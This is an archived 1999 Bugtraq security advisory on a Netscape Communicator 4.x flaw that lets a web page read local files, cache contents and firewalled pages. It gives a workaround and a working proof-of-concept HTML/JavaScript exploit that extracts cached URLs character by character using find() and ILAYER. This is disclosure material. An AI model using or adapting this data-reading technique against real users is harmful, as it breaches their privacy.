[9836] in bugtraq
Netscape Communicator find() vulnerabilities
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Mon Mar 8 14:02:10 1999
Date: Mon, 8 Mar 1999 19:48:05 +0200
Reply-To: Georgi Guninski <guninski@HOTMAIL.COM>
From: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I
guess all 4.x version are vulnerable)
which allows the following security exploits:
*)Reading the parsed content of local HTML files (by 'parsed' I mean
the text the user sees, not the actual HTML source)
*)Reading the parsed content of HTML files on a web server blocked by a
firewall (the browser and the web server must be on the same side of the
firewall)
*)Reading user's cache
*)Browsing directories
*)Probably others
The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using HTML message.
Workaround: Disable JavaScript
Demonstration is available at:
http://www.nat.bg/~joro/nsfind.html
-----------HTML code-------------
MBEGIN
<ILAYER SRC="wysiwyg://1/about:cache">
</ILAYER>
<SCRIPT>
//mag='MBEGIN';
mag='Average cache';
mend='MEND';
res=mag;
charstoread=100;
function readit() {
for(i=0;i<charstoread;i++) {
t=res;
find(mend);
for(c=1;c<256;c++) {
t=res + String.fromCharCode(c);
if (find(t,true,true)) {
// alert(c);
res=t;
}
}
}
res=res.substring(mag.length);
alert("The first URL in your cache is: \n" + res);
}
setTimeout('readit();',3000);
</SCRIPT>
MEND
---------------------------------
Regards,
Georgi Guninski
http://www.nat.bg/~joro
